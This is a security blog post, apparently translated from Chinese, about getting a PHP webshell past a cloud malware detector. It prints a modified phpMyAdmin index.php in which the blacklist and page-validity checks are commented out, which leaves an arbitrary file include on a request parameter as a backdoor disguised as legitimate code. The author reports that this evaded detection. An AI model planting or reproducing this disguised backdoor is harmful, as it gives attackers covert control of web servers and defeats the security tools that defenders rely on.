Aquaboutic | Focus Security Research | Vulnerability Exploit | POC


ivy cloud webshell kill bypass

Posted by deeson at 2020-03-23

Last week saw some friends in Faqing Teng cloud chat records, around a hair 200 red packets. I did a simple test at the weekend. First, the webshell bypassing the D shield is used, and it is found that it is marked as malicious. That's kind of interesting. I went to look at the content of the chat record, to see the principle is to use the way of deep learning. Guessing is done in a supervised way (guessing only). The idea I'm bypassing here is to use open source program to modify and bring in a sentence of backdoor code.

Remember that phpMyAdmin's index.php file contains include root_path. $_request ['target ']; such code, if you do not look at the context, this proper file contains vulnerabilities. However, there are filtering and judgment processing above, which makes it impossible to contain any files. I changed it to include any files. At the same time, keep some source code, and comment out the code that affects execution (because it is suitable for multiple environments, but for files). The final revised code is as follows:

include ROOT_PATH . $_REQUEST['target']; <?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Main loader script * * @package PhpMyAdmin */ declare(strict_types=1); /* use PhpMyAdmin\Controllers\HomeController; use PhpMyAdmin\Core; use PhpMyAdmin\DatabaseInterface; use PhpMyAdmin\Response; use PhpMyAdmin\Url; use PhpMyAdmin\Util; */ if (! defined('ROOT_PATH')) { define('ROOT_PATH', ''); //这里做了修改,不影响后门包含文件 } global $server; //require_once ROOT_PATH . 'libraries/'; /** * pass variables to child pages */ $drops = [ 'lang', 'server', 'collation_connection', 'db', 'table', ]; foreach ($drops as $each_drop) { if (array_key_exists($each_drop, $_GET)) { unset($_GET[$each_drop]); } } unset($drops, $each_drop); /** * Black list of all scripts to which front-end must submit data. * Such scripts must not be loaded on home page. */ $target_blacklist = [ 'import.php', 'export.php', ]; // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && 0 == strpos($_REQUEST['target'], "index") //&& ! in_array($_REQUEST['target'], $target_blacklist) //检查黑名单,注释掉 //&& Core::checkPageValidity($_REQUEST['target'], [], true) //验证page的有效性,也去掉 ) { include ROOT_PATH . $_REQUEST['target']; exit; }

Test whether it can be used normally. After confirming it is available, upload the test. The result is normal. This completes the bypass. The figure below shows the results (test results on December 29, 2019). How to use it can be seen in the previous article that bypasses d-shield.

It's really good to sum up the work of ivy cloud. There are other ways to bypass it. My idea is to avoid the features of Eval and assert, and to bypass it by adding some normal file code. For other ideas, this is only for testing research. In addition, in addition to detection, we need to consider the situation of false positives. A normal file I test has also reported malicious, so this also needs to be weighed.